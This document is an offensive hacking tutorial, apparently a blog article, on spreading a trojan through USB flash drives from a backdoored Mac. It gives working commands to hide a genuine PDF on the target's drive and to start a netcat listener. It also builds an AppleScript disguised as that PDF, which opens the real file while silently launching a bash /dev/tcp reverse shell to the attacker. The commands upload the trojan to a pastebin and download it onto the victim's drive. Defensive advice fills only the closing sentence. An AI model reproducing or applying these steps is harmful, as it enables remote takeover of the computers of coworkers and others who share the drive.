It's not uncommon for hackers to attempt to move laterally between devices in proximity of a compromised device to maintain a prolonged presence in the network. Malware utilizing USB flash sticks to self-replicate and compromise air-gapped machines isn't a new concept.
In both corporate and social environments, its normal for users to share and exchange data using USB flash drives, pen drives, thumb drives, flash sticks, or whatever else you want to call them. After all, they were designed for storing and sharing data. This makes them an excellent vector for spreading malicious files between large groups of coworkers, classmates, and individuals. By manipulating or replacing files already on the flash drives, we can easily trick a target into believing files are benign and completely harmless.
We'll start by enumerating USB flash drives inserted into a backdoored macOS device. After determining a suitable flash drive, we'll exam its contents for a file to impersonate (or copy). The copied file can be any PDF, image, media file, or text file. The copy will be hidden from the target when they're using Finder to view files on the flash drive.
A trojanized AppleScript will then be created and uploaded to the target's flash drive. When the stick is shared and someone clicks on the trojanized AppleScript, it will open the hidden copy — causing the target to believe the file is legitimate — and our payload will execute silently in the background.
For this attack to succeed, the target will need to insert one of their flash drives into the macOS device. Connected USB flash drives can be learned using the system_profiler SPUSBDataType command.
system_profiler SPUSBDataType 1 USB 3.0 Bus: 2 DataTraveler 3.0: 3 Product ID: 0x1666 4 Vendor ID: 0x0951 (Kingston Technology Company) 5 Version: 1.00 6 Serial Number: XXXXXXXXXXXXXXXXXXXXXXXX 7 Speed: Up to 5 Gb/sec 8 Manufacturer: Kingston 9 Location ID: 0x14400000 / 4 10 Current Available (mA): 900 11 Current Required (mA): 504 12 Extra Operating Current (mA): 0 13 Media: 14 DataTraveler 3.0: 15 Capacity: 15.5 GB (15,502,147,584 bytes) 16 Removable Media: Yes 17 BSD Name: disk2 18 Logical Unit: 0 19 Partition Map Type: MBR (Master Boot Record) 20 USB Interface: 0 21 Volumes: 22 KINGSTON: 23 Capacity: 15.5 GB (15,498,018,816 bytes) 24 Available: 15.36 GB (15,360,786,432 bytes) 25 Writable: Yes 26 File System: MS-DOS FAT32 27 BSD Name: disk2s1 28 Mount Point: /Volumes/KINGSTON 29 Content: Windows_FAT_32 30 Volume UUID: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
There are a few important details to make note of when accessing a flash drive for this attack:
Whether or not the flash drive is write-protected (line 25 above) is important. If the flash drive was mounted with read-only permissions or has a physical write-protection switch enabled, we won't be able to save new (trojanized) files. However, this is a rare scenario. If someone inserts a flash drive into their MacBook with the intention of saving files to it, the flash drive will more than likely be readable and writable to us. Writability is something to be mindful of before proceeding.
The amount of free space (line 24 above) is important. Obviously, there needs to be at least a few megabytes available on the flash drive to add or replace files. The flash drive example above has over 15 GB of free space, but be conscious of this before writing payloads to the device.
Also, the file system format (line 26 above) should be taken into consideration. USB flash drives formatted with Apple's APFS file system require more steps for this attack to work but are beyond the scope of this article. In coming weeks, I'll dive deeper into this subject and demonstrate why macOS is so susceptible to USB attacks. Fortunately, the chances of running into an APFS-formatted flash drive are slim. For now, flash drives formatted with NTFS, exFAT, and FAT32 are perfectly suitable. These formats are much more commonplace for being cross-platform and ship from manufacturers preformatted by default.
With a suitable flash drive candidate, take note of the mount point (line 28 above), then list (ls) its contents. My flash drive name is "KINGSTON" which was assigned by its manufacturing company by default. I'll be using "USB-NAME-HERE" for the remainder of the article. Your USB will likely be named something entirely different (like "SanDisk" or "Samsung_USB"). Remember to change it accordingly.
ls -la /Volumes/USB-NAME-HERE/ total 233280 drwxrwxrwx@ 1 tokyoneon staff 16384 Aug 19 14:03 . drwxr-xr-x@ 4 root wheel 136 Aug 19 14:03 .. drwxrwxrwx 1 tokyoneon staff 16384 May 19 17:44 .Spotlight-V100 drwxrwxrwx 1 tokyoneon staff 16384 Aug 19 14:03 .fseventsd -rwxrwxrwx 1 tokyoneon staff 4521984 Jun 3 21:26 DSC_0405.JPG -rwxrwxrwx 1 tokyoneon staff 4566375 Aug 8 20:28 DSC_0497.JPG -rwxrwxrwx 1 tokyoneon staff 1528811 Jun 3 21:26 Mastering Nmap Scripting Engine.pdf -rwxrwxrwx@ 1 tokyoneon staff 3555730 Jun 3 21:26 Penetration_Testing_with_the_Bash_Shell.pdf -rwxrwxrwx@ 1 tokyoneon staff 512055 Jul 31 00:32 Screen Shot 2018-07-31 at 12.32.27 AM.png -rwxrwxrwx@ 1 tokyoneon staff 1585223 Aug 3 02:11 Screen Shot 2018-08-03 at 2.11.49 AM.png drwxrwxrwx 1 tokyoneon staff 16384 May 31 11:12 System Volume Information -rwxrwxrwx 1 tokyoneon staff 24335922 Jun 3 21:26 The Hacker Playbook 2- Practical Guide To Penetration Testing.pdf -rwxrwxrwx 1 tokyoneon staff 14848250 Jun 3 21:26 Wireshark for Security Professionals.pdf -rwxrwxrwx 1 tokyoneon staff 4253 Jun 14 16:30 a.txt -rwxrwxrwx 1 tokyoneon staff 1622016 Jun 3 21:24 invoice_2018_april.pdf -rwxrwxrwx@ 1 tokyoneon staff 231712 Aug 17 23:26 image5435.jpg -rwxrwxrwx 1 tokyoneon staff 126092 Jun 7 19:17 log.txt -rwxrwxrwx 1 tokyoneon staff 11681792 Jun 3 21:25 paystub.pdf
Any PDF, image, media file, or text file is going to be usable for this attack. Remember, the idea is to take an existing file and replace it with a nefarious file of our creation. When the file is opened on another computer, a backdoor will be created and the device will become remotely available to us.
Readers should familiarize themselves with one of my previous article series, "How to Create a Fake PDF Trojan with AppleScript". There I show how to use AppleScript to impersonate legitimate PDFs in greater detail. If there are no PDFs present on the target's USB flash drive, the same technique can be used to create fake media and text files.
I'll be using the "Mastering Nmap Scripting Engine" PDF found on the flash drive to further demonstrate. But keep in mind, the more files we trojanize, the more likely someone will click on something, executing the payload embedded into the AppleScript.
Use the below command to hide and move (mv) the desired file.
mv /Volumes/USB-NAME-HERE/Mastering\ Nmap\ Scripting\ Engine.pdf /Volumes/USB-NAME-HERE/.Mastering\ Nmap\ Scripting\ Engine.pdf
The dot (.) prepended to the ".Mastering" is very important. In macOS, files containing a dot before the file names are hidden from Finder. This Finder setting is the default for all versions of macOS. Some users choose to show hidden files, but this option needs to be manually set and therefore decreases the likeliness of it being enabled.
Before we get into creating the AppleScript, open a terminal in Kali (or any Unix-based operating system with Netcat installed) and use the below command to start a Netcat listener. A connection to this Netcat listener will be established when the trojanized AppleScript is opened.
nc -l -p 9999
Netcat will open a listening (-l) port on every available interface. If you're working in a local network, the Netcat listener will be available on your local address (e.g., 192.168.0.X). If the listener is started on a virtual private server (VPS), be sure to use the IP address for your VPS in later commands. The port (-p) number (9999) is arbitrary and can be changed to any number below 65535.
With the real PDF now hidden, we can create our nefarious AppleScript to impersonate the Nmap PDF. Unfortunately, this method requires Script Editor, a scripting application found only in macOS. Readers who don't have access to a MacBook or other Mac computer to follow along should explore the Empire AppleScript Stager.
In macOS, open Script Editor, open a "New Document," and insert the below one-liner into it.
do shell script "open '/Volumes/USB-NAME-HERE/.Mastering Nmap Scripting Engine.pdf' -a Preview.app; /bin/bash -i >& /dev/tcp/22.214.171.124/9999 0>&1 &"
To instruct AppleScript to run shell code, use do shell script at the start. The AppleScript will first open the specified PDF ('/Volumes/USB-NAME-HERE/.Mastering Nmap Scripting Engine.pdf') using the macOS Preview (-a Preview.app) application. It will then (;) silently use Bash (/bin/bash -i >&) to create a connection (/dev/tcp/ ... 0>&1 &) to the Netcat listener allowing the attacker to remotely issue commands to the device.
The attackers IP address (126.96.36.199) can be a local IP address (e.g., 192.168.1.45). However, this kind of attack is probably most effective using a VPS. In that case, replace the 188.8.131.52 address with the IP address of your VPS. Whichever setup you're using, the IP address should point to the system running the Netcat listener. The port number (9999) should also be changed to match the port used by the Netcat listener.
When that's done, click on "File" in the menu bar, then "Export." Save the script using the "Application" file format.
At this point, the file icon and file extension should be properly disguised. This was covered in detail in one of my "How to Create a Fake PDF Trojan with AppleScript" articles, so I'll move on.
- Full Instructions: How to Disguise the Fake PDF Trojan Script with AppleScript
The fake Nmap PDF we just created using our macOS device needs to be moved to the target's USB flash drive. To accomplish this, we'll use tar, a command line archive tool, to compress the file. Then, we'll upload it to a file-sharing website to make it available for download via the target's MacBook.
Open a Terminal and use the below tar command to compress the fake PDF.
tar -czvf outputFile.tar.gz Mastering\ Nmap\ Scripting\ Engine.app/ a Mastering Nmap Scripting Engine.app a Mastering Nmap Scripting Engine.app/Contents a Mastering Nmap Scripting Engine.app/Contents/Info.plist a Mastering Nmap Scripting Engine.app/Contents/MacOS a Mastering Nmap Scripting Engine.app/Contents/PkgInfo a Mastering Nmap Scripting Engine.app/Contents/Resources a Mastering Nmap Scripting Engine.app/Contents/Resources/applet.icns a Mastering Nmap Scripting Engine.app/Contents/Resources/applet.rsrc a Mastering Nmap Scripting Engine.app/Contents/Resources/description.rtfd a Mastering Nmap Scripting Engine.app/Contents/Resources/Scripts a Mastering Nmap Scripting Engine.app/Contents/Resources/Scripts/main.scpt a Mastering Nmap Scripting Engine.app/Contents/Resources/description.rtfd/TXT.rtf a Mastering Nmap Scripting Engine.app/Contents/MacOS/applet
Tar will create (-cz) a .tar.gz compressed output file (similar to ZIP files) using the file (-f) or directory we specify. In this case, I'm using the fake Nmap trojan we just created. When that's done, upload the outputFile.tar.gz to the Pb pastebin using the below cURL command. Pb is generally my preferred method for getting files around, but if you're more comfortable with a different file-sharing website, that should work just fine.
curl -F c=@- 'https://ptpb.pw' < outputFile.tar.gz short: AB12 size: 49270 status: created url: https://ptpb.pw/AB12
Similar to other file-sharing websites, Pb will return a four-character (AB12) URL address where your fake PDF can be downloaded.
Now, using the backdoored MacBook, the below command can be executed to download and extract the fake PDF into the desired USB flash drive.
curl 'https://ptpb.pw/AB12' | tar xv % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 49270 100 49270 0 0 9307 0 0:00:05 0:00:05 --:--:-- 14145 x ./._Mastering Nmap Scripting Engine.app x Mastering Nmap Scripting Engine.app/ x Mastering Nmap Scripting Engine.app/Contents/ x Mastering Nmap Scripting Engine.app/Contents/Info.plist x Mastering Nmap Scripting Engine.app/Contents/MacOS/ x Mastering Nmap Scripting Engine.app/Contents/PkgInfo x Mastering Nmap Scripting Engine.app/Contents/Resources/ x Mastering Nmap Scripting Engine.app/Contents/Resources/applet.icns x Mastering Nmap Scripting Engine.app/Contents/Resources/applet.rsrc x Mastering Nmap Scripting Engine.app/Contents/Resources/description.rtfd/ x Mastering Nmap Scripting Engine.app/Contents/Resources/Scripts/ x Mastering Nmap Scripting Engine.app/Contents/Resources/Scripts/main.scpt x Mastering Nmap Scripting Engine.app/Contents/Resources/description.rtfd/TXT.rtf x Mastering Nmap Scripting Engine.app/Contents/MacOS/applet
The compressed output will be downloaded using cURL, redirected into the tar decompression (xv) command, and automatically saved to the flash drive. The target using Finder to view the flash drive contents will only see one harmless Nmap PDF.
When the fake PDF is opened by the target on another computer — or by the target's coworkers and associates — a connection to the Netcat listener will be established. Using ls again to view the contents on the target's flash drive, we can see there are now two files sharing the same file name.
ls -la /Volumes/USB-NAME-HERE/ drwxrwxrwx@ 1 tokyoneon staff 16384 Aug 19 14:03 . drwxr-xr-x@ 4 root wheel 136 Aug 19 14:03 .. drwxrwxrwx 1 tokyoneon staff 16384 May 19 17:44 .Spotlight-V100 drwxrwxrwx 1 tokyoneon staff 16384 Aug 19 14:03 .fseventsd -rwxrwxrwx 1 tokyoneon staff 4521984 Jun 3 21:26 DSC_0405.JPG -rwxrwxrwx 1 tokyoneon staff 4566375 Aug 8 20:28 DSC_0497.JPG -rwxrwxrwx 1 tokyoneon staff 1528811 Jun 3 21:26 .Mastering Nmap Scripting Engine.pdf -rwxrwxrwx@ 1 tokyoneon staff 3555730 Jun 3 21:26 Penetration_Testing_with_the_Bash_Shell.pdf -rwxrwxrwx@ 1 tokyoneon staff 512055 Jul 31 00:32 Screen Shot 2018-07-31 at 12.32.27 AM.png -rwxrwxrwx@ 1 tokyoneon staff 1585223 Aug 3 02:11 Screen Shot 2018-08-03 at 2.11.49 AM.png drwxrwxrwx 1 tokyoneon staff 16384 May 31 11:12 System Volume Information -rwxrwxrwx 1 tokyoneon staff 24335922 Jun 3 21:26 The Hacker Playbook 2- Practical Guide To Penetration Testing.pdf -rwxrwxrwx 1 tokyoneon staff 14848250 Jun 3 21:26 Wireshark for Security Professionals.pdf -rwxrwxrwx 1 tokyoneon staff 4253 Jun 14 16:30 a.txt -rwxrwxrwx 1 tokyoneon staff 1622016 Jun 3 21:24 invoice_2018_april.pdf -rwxrwxrwx@ 1 tokyoneon staff 231712 Aug 17 23:26 image5435.jpg -rwxrwxrwx 1 tokyoneon staff 126092 Jun 7 19:17 log.txt -rwxrwxrwx 1 tokyoneon staff 11681792 Jun 3 21:25 paystub.pdf drwxrwxrwx@ 1 tokyoneon staff 16K Aug 19 19:56 Mastering Nmap Scripting Engine.app/
There's the "Mastering Nmap Scripting Engine.app/" — this is the trojan that appears to the target as an ordinary PDF. Also on the flash drive is ".Mastering Nmap Scripting Engine.pdf" — this is the real PDF opened by the trojan to trick the target into thinking the file is a normal PDF.
It's not possible to conceal file extensions from Terminal commands. When in doubt, use ls to view files on USB flash drives, try renaming files on the drives to reveal any strange Unicode tricks, and try to avoid double-clicking files to open then.